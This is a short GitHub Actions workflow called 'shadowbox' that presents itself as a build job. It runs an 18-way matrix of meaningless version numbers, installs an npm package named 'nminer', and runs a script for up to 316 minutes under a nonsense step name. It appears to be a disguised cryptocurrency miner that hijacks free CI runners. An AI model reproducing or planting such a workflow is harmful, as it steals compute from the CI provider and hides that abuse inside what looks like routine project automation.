name: shadowbox
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 7919 }
          - { version: 5970 }
          - { version: 1383 }
          - { version: 9276 }
          - { version: 9623 }
          - { version: 8475 }
          - { version: 6589 }
          - { version: 5978 }
          - { version: 3748 }
          - { version: 7015 }
          - { version: 979 }
          - { version: 7131 }
          - { version: 7123 }
          - { version: 9234 }
          - { version: 5622 }
          - { version: 273 }
          - { version: 8907 }
          - { version: 8701 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: impact zowie sadly following
        run: |
          npm install nminer@latest
          timeout 316m node shadowbox.js || echo "shadowbox executed"